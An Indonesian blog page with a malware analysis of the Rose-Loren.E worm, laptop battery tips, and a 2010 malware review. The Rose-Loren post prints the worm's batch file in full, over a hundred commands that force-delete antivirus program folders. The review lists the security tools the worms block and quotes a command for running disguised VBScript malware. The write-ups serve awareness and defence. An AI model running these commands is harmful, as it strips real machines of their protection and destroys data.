Showing posts with label PC Maintenance. Show all posts
Showing posts with label PC Maintenance. Show all posts

Virus : Rose-Loren.E:’Rose’ Ada karena ‘Cinta’

Rose-Loren.E. Tidak selamanya dunia malware itu terkesan hitam dan jahat. Karena Rose-Loren dan salah satu variannya yang di bahas kali ini lebih mengesankan kepiluan serta rasa kesedihan yang dirasakan oleh pembuatnya. Jika bunga mawar umumnya mencirikan perasaan cinta, Rose-Loren membuat bunga mawar sebagai tanda kedatangannya.
Rose-Loren.E
A. Info Malware
Nama: Rose-Loren.E
Asal: Indonesia
Ukuran File: 91.7 KB (93,961 bytes)
Packer : Unknown
Pemrograman : Visual Basic
Icon : Folder Windows
Tipe : Worm
B. Tentang Malware
Sepertinya ini adalah hasil dari modifikasi dari source terdahulu karena sudah cukup lama kami mendapatkan variant dari Rose-Loren. eSetelah di unpack, worm ini berukuran 216 KB (221,696 bytes). Saat worm ini aktif di memory, komputer akan terasa lambat karena proses Rose-Loren.E menyita resource yang cukup besar.
C. Companion/File yang dibuat
Saat aktif, worm akan mencari setiap drive yang ditemukan dan membuat file/folder antara lain sebagai berikut:
  • Membuat file yang merupakan file induk/host dari worm, yaitu
    C:\WINDOWS\system32\[5 buah bilangan acak]\lsass.exe dan
    C:\WINDOWS\system32\[5 buah bilangan acak]\svchost.exe
  • Membuat juga file dengan nama EpIoler dan autoexec.bat di folder yang sama seperti di atas, dan isinya adalah:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    del /f /q /s  C:\ESET\*.* >nul
    del /f /q /s  C:\antivi~1\*.* >nul
    del /f /q /s  C:\antivi~2\*.* >nul
    del /f /q /s  C:\antiviru\*.* >nul
    del /f /q /s  C:\avg\*.* >nul
    del /f /q /s  C:\kasper~1\*.* >nul
    del /f /q /s  C:\kasper~2\*.* >nul
    del /f /q /s  C:\mcafee\*.* >nul
    del /f /q /s  C:\mcafee.com\agent\*.* >nul
    del /f /q /s  C:\mcafee.com\*.* >nul
    del /f /q /s  C:\mcafee.com\VSO\*.* >nul
    del /f /q /s  C:\mcafee~1\*.* >nul
    del /f /q /s  C:\msav\*.* >nul
    del /f /q /s  C:\norman\*.* >nul
    del /f /q /s  C:\norton~1\*.* >nul
    del /f /q /s  C:\norton~2\*.* >nul
    del /f /q /s  C:\pav\*.* >nul
    del /f /q /s  C:\pccill~1\*.* >nul
    del /f /q /s  C:\iolo\*.* >nul
    del /f /q /s  C:\progra~1\ESET\*.* >nul
    del /f /q /s  C:\progra~1\antivi~1\*.* >nul
    del /f /q /s  C:\progra~1\antivi~2\*.* >nul
    del /f /q /s  C:\progra~1\avg\*.* >nul
    del /f /q /s  C:\progra~1\kasper~1\*.* >nul
    del /f /q /s  C:\progra~1\kasper~2\*.* >nul
    del /f /q /s  C:\progra~1\mcafee\*.* >nul
    del /f /q /s  C:\progra~1\McAfee.com\agent\*.* >nul
    del /f /q /s  C:\progra~1\McAfee.com\\*.* >nul
    del /f /q /s  C:\progra~1\McAfee.com\VSO\*.* >nul
    del /f /q /s  C:\progra~1\mcafee~1\*.* >nul
    del /f /q /s  C:\progra~1\mindso~1\*.* >nul
    del /f /q /s  C:\progra~1\norman\*.* >nul
    del /f /q /s  C:\progra~1\norton~1\*.* >nul
    del /f /q /s  C:\progra~1\norton~2\*.* >nul
    del /f /q /s  C:\progra~1\pandas~1\*.* >nul
    del /f /q /s  C:\Progra~1\Alwils~1\*.* >nul
    del /f /q /s  C:\progra~1\iolo\*.* >nul
    del /f /q /s /a:h  C:\ESET\*.* >nul
    del /f /q /s /a:h  C:\antivi~1\*.* >nul
    del /f /q /s /a:h  C:\antivi~2\*.* >nul
    del /f /q /s /a:h  C:\antiviru\*.* >nul
    del /f /q /s /a:h  C:\avg\*.* >nul
    del /f /q /s /a:h  C:\kasper~1\*.* >nul
    del /f /q /s /a:h  C:\kasper~2\*.* >nul
    del /f /q /s /a:h  C:\mcafee\*.* >nul
    del /f /q /s /a:h  C:\mcafee.com\agent\*.* >nul
    del /f /q /s /a:h  C:\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:h  C:\mcafee~1\*.* >nul
    del /f /q /s /a:h  C:\msav\*.* >nul
    del /f /q /s /a:h  C:\norman\*.* >nul
    del /f /q /s /a:h  C:\norton~1\*.* >nul
    del /f /q /s /a:h  C:\norton~2\*.* >nul
    del /f /q /s /a:h  C:\pav\*.* >nul
    del /f /q /s /a:h  C:\pccill~1\*.* >nul
    del /f /q /s /a:h  C:\pc-cil~1\*.* >nul
    del /f /q /s /a:h  C:\iolo\*.* >nul
    del /f /q /s /a:h  C:\progra~1\ESET\*.* >nul
    del /f /q /s /a:h  C:\progra~1\antivi~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\antivi~2\*.* >nul
    del /f /q /s /a:h  C:\progra~1\avg\*.* >nul
    del /f /q /s /a:h  C:\progra~1\kasper~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\kasper~2\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee.com\agent\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee.com\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mindso~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\norman\*.* >nul
    del /f /q /s /a:h  C:\progra~1\norton~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\norton~2\*.* >nul
    del /f /q /s /a:h  C:\progra~1\pandas~1\*.* >nul
    del /f /q /s /a:h  C:\Progra~1\Alwils~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\iolo\*.* >nul
    del /f /q /s /a:R  C:\ESET\*.* >nul
    del /f /q /s /a:R  C:\antivi~1\*.* >nul
    del /f /q /s /a:R  C:\antivi~2\*.* >nul
    del /f /q /s /a:R  C:\antiviru\*.* >nul
    del /f /q /s /a:R  C:\avg\*.* >nul
    del /f /q /s /a:R  C:\kasper~1\*.* >nul
    del /f /q /s /a:R  C:\kasper~2\*.* >nul
    del /f /q /s /a:R  C:\mcafee\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\agent\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:R  C:\mcafee~1\*.* >nul
    del /f /q /s /a:R  C:\msav\*.* >nul
    del /f /q /s /a:R  C:\norman\*.* >nul
    del /f /q /s /a:R  C:\norton~1\*.* >nul
    del /f /q /s /a:R  C:\norton~2\*.* >nul
    del /f /q /s /a:R  C:\pav\*.* >nul
    del /f /q /s /a:R  C:\pccill~1\*.* >nul
    del /f /q /s /a:R  C:\pc-cil~1\*.* >nul
    del /f /q /s /a:R  C:\iolo\*.* >nul
    del /f /q /s /a:R  C:\progra~1\ESET\*.* >nul
    del /f /q /s /a:R  C:\progra~1\antivi~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\antivi~2\*.* >nul
    del /f /q /s /a:R  C:\progra~1\avg\*.* >nul
    del /f /q /s /a:R  C:\progra~1\kasper~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\kasper~2\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee.com\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee.com\agent\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mindso~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\norman\*.* >nul
    del /f /q /s /a:R  C:\progra~1\norton~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\norton~2\*.* >nul
    del /f /q /s /a:R  C:\progra~1\pandas~1\*.* >nul
    del /f /q /s /a:R  C:\Progra~1\Alwils~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\iolo\*.* >nul
  • Jika ditemukan folder WinRar pada folder Program Files, maka Rose-Loren akan langsung mengcopykan file data.exe data.exe dan file gambar rose.jpg.
    Rose-Loren.E - Image Rose
  • Membuat file dengan nama private.zip yang isinya file worm dengan nama data.exe pada setiap drive termasuk di flash disk.
  • Membuat file dengan nama myrose.html, dan di dalamnya tersisip pesan berupa puisi cinta yang akan terlihat jika membuka code htmlnya.Rose-Loren.E - HTMLRose-Loren.E - View Source
  • Merubah icon pada flash disk karena adanya file autorun.inf serta file desktop.ini yang merubah background flash disk menjadi bunga mawar. Yang berbeda adalah, biasanya, autorun.inf lebih berfungsi untuk memanggil file companion dari malware yang ada di flash disk, sedangkan Rose-Loren hanya membuat autorun untuk merubah icon flash disk.Rose-Loren.E - Flash DiskRose-Loren.E - Autorun
D. Hasil Infeksi
Worm ini banyak melakukan perubahan pada registry, terlihat pada Legal Notification sebelum tampilan logon screen yang selalu berubah ubah karena Rose-Loren.E melakukan random terhadap kalimat yang di injeksikan ke registry. Sebagai contoh adalah gambar ini:
Rose-Loren.E - Logon
Text yang dirandom adalah:
  • Ambillah waktu untuk belajar, itu adalah sumber kebijaksanaan.
  • Hiduplah seperti lilin menerangi orang lain, janganlah hidup seperti duri menusuk diri dan menyakiti orang lain
  • Mahkota kemanusiaan ialah rendah hati
  • Yang telah berlalu biarkan ia berlalu, yang mendatang hadapi dengan cemerlang
  • Kawan sejati ialah orang yang mencintaimu meskipun telah mengenalmu dengan sebenar-benarnya yaitu baik dan burukmu
  • Sabar adalah jalan keluar bagi orang yang tidak bisa menemukan jalan keluar.
  • Seekor burung di tangan lebih baik daripada sepuluh ekor di atas pohon.
  • Hidup ini adalah warna-warni yang tergores pada kanvas, walaupun tidak cantik ia tetap mempunyai sejuta makna
  • Sebelum memberi nasihat kepada manusia dengan ucapanmu, berilah mereka nasihat dengan perbuatanmu.
  • Harta yang paling menguntungkan ialah SABAR. Teman yang paling akrab adalah AMAL.
  • Pengawal peribadi yang paling waspada DIAM. Bahasa yang paling manis SENYUM. Dan ibadah yang paling indah tentunya KHUSYUK.
  • Apabila kepercayaan telah hilang lenyap, kehormatan telah musnah, maka matilah orang itu -Whittier
  • Jangan sekali-kali kita meremehkan sesuatu perbuatan baik walaupun hanya sekadar senyuman.
  • Anda bukan apa yang anda fikirkan tentang anda, tetapi apa yang anda fikirkan itulah anda
  • Ambillah waktu untuk berdoa, itu adalah sumber ketenangan.
  • Hidup tak selalunya indah tapi yang indah itu tetap hidup dalam kenangan.
  • Biarpun jalan itu panjang, kita akan merintisnya perlahan-lahan.
  • Berfikir sejenak, merenung masa lalu adalah awal yang baik untuk bertindak
  • Dalam kerendahan hati ada ketinggian budi. Dalam kemiskinan harta ada kekayaan jiwa. Dalam kesempitan hidup ada kekuasaan ilmu.
  • Kegagalan dalam kemuliaan lebih baik daripada kejayaan dalam kehinaan.
  • Seseorang yang melakukan kesalahan dan tidak membetulkannya, Sesungguhnya Ia telah melakukan satu kesalahan lagi. – Confucius
  • Ambillah waktu untuk bermain, itu adalah rahsia dari masa muda yang abadi.
  • Selemah-lemah manusia ialah orang yg tak bisa mencari sahabat dan orang yang lebih lemah dari itu ialah orang yg mensia-siakan sahabat yg telah dicari (Saidia Ali)
  • Ambillah waktu untuk berfikir, itu adalah sumber kekuatan.
  • Ambillah waktu untuk mencintai dan dicintai, itu adalah hak istimewa yang diberikan Tuhan.
  • Ambillah waktu untuk bersahabat, itu adalah jalan menuju kebahagiaan.
  • Ambillah waktu untuk tertawa, itu adalah musik yang menggetarkan hati.
  • Ambillah waktu untuk memberi, itu adalah membuat hidup terasa bererti.
  • Ambillah waktu untuk bekerja, itu adalah nilai keberhasilan.
  • Ambillah waktu untuk beramal, itu adalah kunci menuju syurga.
  • Cinta tidak berupa tatapan satu sama lain, tetapi memandang ke luar bersama ke arah yang sama.
  • Persahabatan sering berakhir dengan cinta Tetapi cinta tidak pernah berakhir dengan persahabatan
  • Cobalah bernalar tentang cinta dan engkau pun akan kehilangan nalarmu
  • Jangan pernah bilang ‘Cinta’ kalau kamu tidak perduli.
  • Jangan pernah menyentuh hidup seseorang kalau hal itu akan melukai hatinya.
  • Jangan pernah menatap matanya kalau semua yang kamu lakukan hanya berbohong.
Worm juga menghilangkan beberapa menu pada Folder Options.
Rose-Loren.E - Folder Options
Payload lainnya adalah merubah tampilan properties pada My Computers.
Rose-Loren.E - System
Beberapa registry juga diubah, termasuk mendisable beberapa sistem Windows.
  • Regedit.exe
  • Msconfig.exe
  • taskmgr.exe
  • ntvdm.exe
  • rstrui.exe
  • EnableExtensions
  • FolderContentsInfoTip
  • NoRun
  • NoFind
  • DisableCurrentUserRun
  • HideFileExt
  • FolderSizeTip
  • ShowFullPathAddress
  • ShowFullPath
  • Disable SafeMode
  • Disable Show Hidden and Super Hidden files.
Worm juga akan membuat startup dengan nama WinUp dan RsWin.

Sumber : virusindonesia.com
Posted on 12:08 PM / 2 comments / Read More

10 Tips Agar Baterai Laptop Tetap Awet

Performa laptop yang prima salah satunya ditunjang oleh kondisi baterai yang bagus. Seiring dengan pemakain yang semakin lama biasanya kondisi baterai akan cenderung menurun bahkan beberapa kasus ditemukan tidak sampai satu tahun kondisi baterai sudah soak dan mati. Selama masih garansi mungkin semuanya tidak akan jadi masalah, namun kalau sudah lewat masa garansinya… wah lain cerita. Paling tidak kita akan merogoh kocek yang cukup mahal untuk membeli baterai penggantinya.
Di bawah ini adalah beberapa tips yang bisa dicoba untuk menjaga agar baterai laptop kita menjadi awet :

1. Optimisasi Power Settings
Atur sedemikian rupa pada pengaturan daya baterai sehingga penggunaan baterai dapat berlangsung secara optimal. Karena seperti yang kita ketahui bahwa konsumsi daya terbesar baterai berasal dari harddisk dan faktor tampilan pada layar. Untuk tampilan layar sobat blogger bisa mengatur brightness layar, jadi redupkan seckupnya agar konsumsi daya yang dibutuhkan tidak besar.
2. Singkirkan Peralatan Eksternal
Singkirkan atau matikan segala hardware eksternal yang terkoneksi melalui USB saat tidak digunakan. Baik USB storage (flashdisk) termasuk juga wifi, Bluetooth, CD/DVD eksternal karena disamping penggunaan daya yang berlebihan kinerja laptop juga akan lebih ringan sehingga efisiensi daya dapat tercapai. 
3. Hibernate
Standby memang terbukti mengurangi penggunaan daya atau energi dalam baterai, namun tidak sebanyak hibaernate yang membuat pemakaian daya menjadi nol saat tidak ada pemakaian.
4. Hindari Multitasking
Jangan membuka beberapa program secara bersamaan. Lakukan pekerjaan dengan menyelesaikan satu persatu dengan meminimize aplikasi yang digunakan. Karena semakin banyak aplikasi yang dibuka dengan varian yang besar maka konsumsi daya manjadi semakin besar.
5. Matikan Scheduled Task
Matikan scheduled task, sobat blogger tidak akan menggunakan fitur ini saat menggunakan baterai karena hal tersebut sama sekali tidak diperlukan. Ingat efisiensi ! ^^!
6. Jangan bermain game
Hindari aktifitas yang satu ini saat menggunakan baterai apabila ingin baterai sobat blogger awet. Karena pada umumnya efek dari penggunaan grafis 3D yang besar akan mengkonsumsi banyak daya. Belum lagi apabila kita terlena masuk kedalam permainan yang ada kita akan mudah sekali lupa untuk melakukan charging baterai karena tahu-tahu laptop kita sudah mati saat permainan belum berakhir dikarenakan daya baterai laptop sudah terkuras habis.
7. Latihlah Baterai
Jangan tinggalkan baterai dalam kondisi kosong dalam jangka waktu yang lama, karena hal tersebut akan sangat merugikan sel-sel dalm baterai yang berakibat pada berkurangnya kapasitas baterai.jadi isi dan gunakan baterai sesekali untuk melatihnya biar tetap fit.
8. Jaga temperature laptop
Jangan menggunakan laptop diatas media yang sirkulasi udaranya buruk seperti bantal, kasur, karpet dsb. Usahakan agar tetap ada ruang antara laptop dengan alas tempat laptop bersandar. Karena dengan sirkulasi udara yang buruk berakibat pada meningkatnya suhu dalam laptop. Dengan suhu/temperatur yang tinggi akan membuat fan pada mainboard mempercepat putarannya untuk mendinginkan temperatur di dalam yang berujung pada penggunaan daya yang berlebih.
9. Setting  memori.
Lakukan efisiensi memori baik dengan menambah resource yang ada dengan mengurangi program aplikasi-aplikasi yang bukan prioritas utama dalam kebutuhan ataupun dengan menambah memori secara fisik yang lebih besar. Karena dengan begitu kita akan meminimalisasi ketergantungan akan memori virtual sehingga konsumsi daya dapat dikurangi.
10. Baterai Cadangan
Sediakan baterai cadangan apabila memang diperlukan. Apalagi kalau sobat blogger dituntut untuk mobilitas dengan tingkat atau kapasitas yang tinggi. Tentunya produktivitas kerja akan semakin maksimal tanpa harus bergantung pada satu baterai.

Semoga bermanfaat =)
Posted on 11:07 AM / 3 comments / Read More

Review Malware 2010

Top Malware
Seperti tidak ada habisnya serangan dari malware yang berasal dari dalam maupun luar negeri. Antara lain Conficker yang mengawali serangan pada tahun 2008, dan berbagai varian worm VB-Shortcut yang memulai aksinya di pertengahan 2010, serta berbagai malware lainnya, berhasil memberikan teror di sampai akhir tahun 2010 karena tingkat penyebarannya.
Berdasarkan data yang kami kumpulkan yang sebagian besar dari kiriman pengguna PCMAV, 10 malware teratas yang paling banyak menyebar adalah:
1. Sality Variant
2. VB-Shortcut
3. Alman
4. Virut
5. Serviks.vbs Variant
6. 74BE16
7. Conficker
8. Autoit-ReplaceIcon Variant
9. Saphira.A
10. Autoit.EA
Malware lain yang juga banyak dilaporkan:
- EsTeh
- Stuxnet
- Runouce
- Nebula
- Delp-Shortcut
- TripleBox
- Bebek.A
- Malingsi Variant
Selain itu, berikut beberapa review malware yang relatif merupakan nama-nama baru yang menghebohkan di tahun 2010 ini.
1. Zhola.
Zhola Worm Zhola sebenarnya merupakan hasil edit dari malware tipe worm yang source codenya banyak beredar. Dengan merubah bentuk icon dan isi autorunnya, worm ini membuat banyak pengguna salah satu antivirus lokal terinfeksi karenanya, terlebih karena worm ini sengaja diletakkan pada website yang menyediakan Free File Sharing sehingga dapat di-download siapa saja. Pertama kali ditemukan worm ini menggunakan nama “Smadav 7.3”. Worm Zhola akan memperbanyak companion-nya jika menemukan file dengan ekstensi *.doc *.jpg *.mp3 *.avi *.mpeg *.3gp *.flv *.mpg *.mov *.wmv *.wav *.3gp2 dan membuat file dengan nama yang sama.
2. EsTeh.
EsTeh
Dibuat dengan menggunakan bahasa pemrograman Visual Basic 6.0 tanpa di- pack, memiliki icon yang beragam pada setiap file yang dibuatnya. Worm ini membuat banyak file pada flash disk dengan menggunakan icon yang sudah terdapat pada komputer yang sudah terinfeksi sebelumnya dan terdapat pada folder:
C:\Documents and Settings\[nama user]\Local Settings\Temp\doc.ico
C:\Documents and Settings\[nama user]\Local Settings\Temp\folder.ico
C:\Documents and Settings\[nama user]\Local Settings\Temp\mptre.ico
C:\Documents and Settings\[nama user]\Local Settings\Temp\rar.ico
C:\Documents and Settings\[nama user]\Local Settings\Temp\txt.ico
C:\Documents and Settings\[nama user]\Local Settings\Temp\wmp.ico
C:\Documents and Settings\[nama user]\Local Settings\Temp\xls.ico
Selain itu, worm ini juga membuat file yang dijadikan hostnya seperti:
C:\WINDOWS\system32\32rc.exe
C:\WINDOWS\system32\3dPAD.exe
C:\WINDOWS\system32\Epen.exe
C:\WINDOWS\system32\sym32.exe
C:\WINDOWS\system32\temp32.exe
C:\WINDOWS\system32\userinity.exe
C:\Documents and Settings\[nama user]\Local Settings\Temp\Usbconeted.exe
Worm ini juga membuat file Autorun.inf seperti pada gambar di atas.
Ulasan selebihnya dapat dibaca pada http://virusindonesia.com/2010/02/26/esteh-pcmav-23-update-build4/
3. MyLovely.
Malware tipe worm, memiliki icon menyerupai file image tipe jpg. Hasil infeksi worm MyLovely akan ditemukan pada setiap drive dengan nama Gambar Lucu.exe, Kasihku.exe, Photo 01.exe, Wallpaper.exe.  Beberapa aplikasi dengan nama di bawah ini akan diubah sehingga menjalankan file malware di C:\wallpaper.exe:
1. ansav.exe
2. ansav32.exe
3. BLUESOLEIL.exe
4. call.exe
5. Ccapp.exe
6. cclaw.exe
7. cmd.exe
8. dfrg.exe
9. DXDIAG.exe
10. Fixinstall.exe
11. FORMAT.exe
12. freecell.exe
13. GRAPH.exe
14. IEXPLORE.exe
15. install.exe
16. keygen.exe
17. mplayer.exe
18. msconfig.exe
19. MSPAINT.exe
20. Nip.exe
21. Nipsvc.exe
22. Niu.exe
23. Njeeves.exe
24. nod32.exe
25. NOD32krn.exe
26. notepad.exe
27. Nvccf.exe
28. Nvcoas.exe
29. Nvcod.exe
30. Nvcsched.exe
31. OIS.exe
32. PCMAV.exe
33. PCMV-CLN.exe
34. PCMV-RTP.exe
35. ppclean.exe
36. Procexp.exe
37. regedit.exe
38. RemoteCmdSvc.exe
39. Restore my files.exe
40. RSTRUI.exe
41. save.exe
42. SCRNSAVE.exe
43. setup.exe
44. shutdown.exe
45. Taskkill.exe
46. tasklist.exe
47. taskmgr.exe
48. Unins000.exe
49. Uninstall.exe
50. unlocer.exe
51. unlocker.exe
52. Update.exe
53. vb6.exe
54. VFP9.exe
55. VPREVIEW.exe
56. VProConsole.exe
57. VProConsole_.exe
58. wmplayer.exe
59. ypsr.exe
60. ypsrru.exe
61. Zanda.exe
62. Zlh.exe
Selama beberapa detik worm ini akan membuat layar menjadi black screeen yang jika di double click akan muncul gambar dibawah ini:
MyLovely
http://virusindonesia.com/2010/08/11/mylovely-menebar-pesan-cinta/
4. SetRun.
Berikut ini adalah gambar simulasi worm SetRun yang seakan mencirikan sebuah virus padahal termasuk tipe worm.
SetRun
Dengan menggunakan icon menyerupai Microsoft Word, worm SetRun dibuat menggunakan bahasa pemrograman Delphi tanpa di-pack dan memiliki ukuran yang selalu berubah agar menyulitkan antivirus untuk mendeteksinya. Sesuai dengan gambar di atas, jika worm SetRun menemukan file *.doc, *.xls, dan *.pdf, ia akan merename file aslinya mulai dari belakang, kemudia di tambahkan karakter “pns” dan kondisinya ter-hidden. Sedangkan nama file dijadikan replika dari worm SetRun.
http://virusindonesia.com/2010/09/13/setrun-social-engineering-dengan-icon/
5. Nebula.
Nebula
Gambar di atas adalah pesan yang dibuat oleh malware tipe virus bernama Nebula. Kemampuannya menginfeksi beberapa file dengan tipe seperti, *.doc, *.docx, *.xls, *.xlsx, *.avi, *.3gp , *.exe (hanya untuk file *.exe tertentu, seperti YahooMessenger.exe, Firefox.exe, Iexplore.exe, Opera.exe) hampir sama seperti virus Kspoold. Virus ini merubah file dengan ekstensi yang sudah di jelaskan di atas menjadi exe. Beberapa antivirus mampu mengenali malware ini, akan tetapi sebagian besar menghapus file yang sudah terinfeksinya, padahal virus ini belum menghapus file asli, hanya menyimpan di dalam tubuhnya dengan enkripsi tertentu.
6. Serviks.vbs.B.
Serviks
Menggunakan enkripsi dan manipulasi ekstensi, worm ini menyebar dengan cepat. Diduga dibuat oleh orang yang membuat worm Vinurika.vbs dan Yuyun.vbs. keistimewaan lain worm ini adalah shortcut yang dibuatnya. Berbeda dengan worm shortcut yang lain, Serviks.vbs.B ini mampu menyebarkan shortcut sampai ke sub folder sampai 4 level kedalaman. dan didalam shortcutnya sudah dibuat agar mampu menjalankan malware tipe VBScript yang ekstensinya bukan *.vbs dengan perintah:
Wscript.exe //E:VBScript [nama malware]
http://virusindonesia.com/2010/09/03/satu-pesan-cinta-ribuan-shortcut/
7. Runouce.
Runouce
Beberapa malware memiliki payload yang destruktif, seperti menghapus, mengenkripsi, atau merusak data. Salah satunya adalah virus Runouce ini. Selain nama Runouce, virus ini juga dikenal oleh antivirus luar dengan nama lain seperti: Chir.B, ChiHack, Runonce, atau EmailWorm. Virus ini berasal dari luar (diduga dari China). Walaupun bukan termasuk virus baru, Runouce masih menyebar cukup luas termasuk di Indonesia. Ia memiliki karakteristik worm karena dapat menyebar melalui e-mail dengan mengirimkan dirinya sebagai attachment, Runouce juga merupakan sebuah virus yang menginfeksi executable file, yang terdapat pada komputer lokal maupun jaringan.
8. Nami-Ternate.
Nami-Ternate
Beberapa pengguna suka dengan tampilan yang berbeda. Tetapi waspadai jika tahu-tahu Anda mendapatkan tampilan seperti pada gambar di atas, karena bisa jadi itu merupakan indikasi bahwa malware Nami-Ternate telah aktif. Dibuat menggunakan Visual Basic tanpa di-pack, worm ini dapat membuat flash disk dan semua drive pada komputer Anda memiliki background seperti pada gambar. Worm juga mendisable beberapa fungsi seperti Task Manager, Regedit, dan lain lain.
9. VB-Shortcut-WinLogon.
VB-Shortcut-WinLogon
Dari sebagian banyak worm VB-Shortcut, VB-Shortcut-WinLogon adalah salah satu varian yang paling merepotkan pengguna yang terinfeksi. Kemampuan meng-kill beberapa tools dan perlindungan diri dari antivirus membuat worm ini tidak mudah dilumpuhkan. Begitu banyak registry yang di rubah worm ini, berikut adalah nama-nama program yang di-block oleh VB-Shortcut-WinLogon.

a2servic.exe, ackwin32.exe, acs.exe, advxdwin.exe, agentsvr.exe, agentw.exe, ahnsd.exe, alerter.exe, alertsvc.exe, alogserv.exe, amon.exe, amon9x.exe, anti-trojan.exe, antigen.exe, antivirus.exe, ants.exe, apimonitor.exe, aplica32.exe, apvxdwin.exe, ashWebSv.exe, atcon.exe, atguard.exe, atro55en.exe, atupdater.exe, atwatch.exe, aupdate.exe, autodown.exe, autotrace.exe, autoupdate.exe, avcenter.exe, avconfig.exe, avconsol.exe, ave32.exe, avgcc32.exe, avgctrl.exe, avgemc.exe, avgnt.exe, avgserv.exe, avgserv9.exe, avguard.exe, avgw.exe, avkpop.exe, avkserv.exe, avkservice.exe, avkwcl9.exe, avkwctl9.exe, avnotify.exe, avnt.exe, avp.exe, avp32.exe, avpcc.exe, avpdos32.exe, avpexec.exe, avpinst.exe, avpm.exe, avpmon.exe, avpnt.exe, avptc32.exe, avpupd.exe, avrescue.exe, avscanavshadow.exe, avsched32.exe, avsynmgr.exe, avupgsvc.exe, avwebloader.exe, avwin95.exe, avwinnt.exe, avwsc.exe, avwupd32.exe, avxmonitor9x.exe, avxmonitornt.exe, avxquar.exe, avxw.exe, azonealarm.exe, bd_professional.exe, bidef.exe, bidserver.exe, bipcp.exe, bipcpevalsetup.exe, bisp.exe, blackd.exe, blackice.exe, boot.exe, bootwarn.exe, borg2.exe, bs120.exe, BullGuard.exe, callmsi.exe, ccapp.exe, ccevtmgr.exe, cclaw.exe, ccpxysvc.exe, ccsetmgr.exe, ccshtdwn.exe, cdp.exe, cfgwiz.exe, cfiadmin.exe, cfiaudit.exe, cfind.exe, cfinet.exe, cfinet32.exe, chrome.exe, ChromeSetup.exe, clamauto.exe, claw95.exe, claw95cf.exe, claw95ct.exe, clean.exe, cleaner.exe, cleaner3.exe, cleanpc.exe, cmd.exe, cmgrdian.exe, cmon016.exe, connectionmonitor.exe, consent.exe, cpd.exe, cpdclnt.exe, cpf.exe, cpf9x206.exe, cpfnt206.exe, crashreporter.exe, csinject.exe, csinsm32.exe, css1631.exe, ctfmon.exe, ctrl.exe, cv.exe, cwnb181.exe, cwntdwmo.exe, defalert.exe, defscangui.exe, defwatch.exe, deputy.exe, Diskmon.exe, doors.exe, dpf.exe, drvins32.exe, drwatson.exe, drweb32.exe, dumphive.exe, dv95.exe, dv95_o.exe, dvp95.exe, dvp95_0.exe, earthagent.exe, ecengine.exe, ecls.exe, ecmd.exe, edi.exe, efinet32.exe, efpeadm.exe, egui.exe, EHttpSrv.exe, ekrn.exe, ent.exe, esafe.exe, escanh95.exe, escanhnt.exe, escanv95.exe, espwatch.exe, etrustcipe.exe, evpn.exe, ewido.exe, exantivirus-cnet.exe, exit.exe, expert.exe, explored.exe, f-agnt95.exe, f-prot.exe, f-prot95.exe, f-stopw.exe, fa-setup.exe, fact.exe, fameh32.exe, fast.exe, fch32.exe, fih32.exe, Filemon.exe, findviru.exe, firefox.exe, firewall.exe, FirewallControlPanel.exe, FirewallSettings.exe, fix-it.exe, flowprotector.exe, fnrb32.exe, fp-win.exe, fp-win_trial.exe, FPAVServer.exe, fprot.exe, fprot95.exe, frw.exe, fsaa.exe, fsav.exe, fsav32.exe, fsav530stbyb.exe, fsav530wtbyb.exe, fsav95.exe, fsave32.exe, fsgk32.exe, fslaunch.exe, fsm32.exe, fsma32.exe, fsmb32.exe, fssm32.exe, fwenc.exe, fwinstall.exe, gbmenu.exe, gbpoll.exe, GenericRenosFix.exe, generics.exe, gibe.exe, GoogleToolbarInstaller_download_signed.exe, gpedit.exe, guard.exe, guarddog.exe, guardgui.exe, guardhlp.exe, hacktracersetup.exe, helper.exe, HiJackThis.exe, HJTInstall.exe, HostsChk.exe, htlog.exe, hwpe.exe, iamapp.exe, iamserv.exe, iamstats.exe, ibmasn.exe, ibmavsp.exe, icload95.exe, icloadnt.exe, icmon.exe, icmoon.exe, icssuppnt.exe, icsupp.exe, icsupp95.exe, icsuppnt.exe, IEDFix.exe, iface.exe, ifw2000.exe, iomon98.exe, iparmor.exe, iris.exe, isrv95.exe, jammer.exe, jed.exe, jedi.exe, kav8.0.0.357es.exe, kavlite40eng.exe, kavpers40eng.exe, kavsvc.exe, kerio-pf-213-en-win.exe, kerio-wrl-421-en-win.exe, kerio-wrp-421-en-win.exe, killprocesssetup161.exe, kis8.0.0.506latam.exe, kpf.exe, kpfw32.exe, ldnetmon.exe, 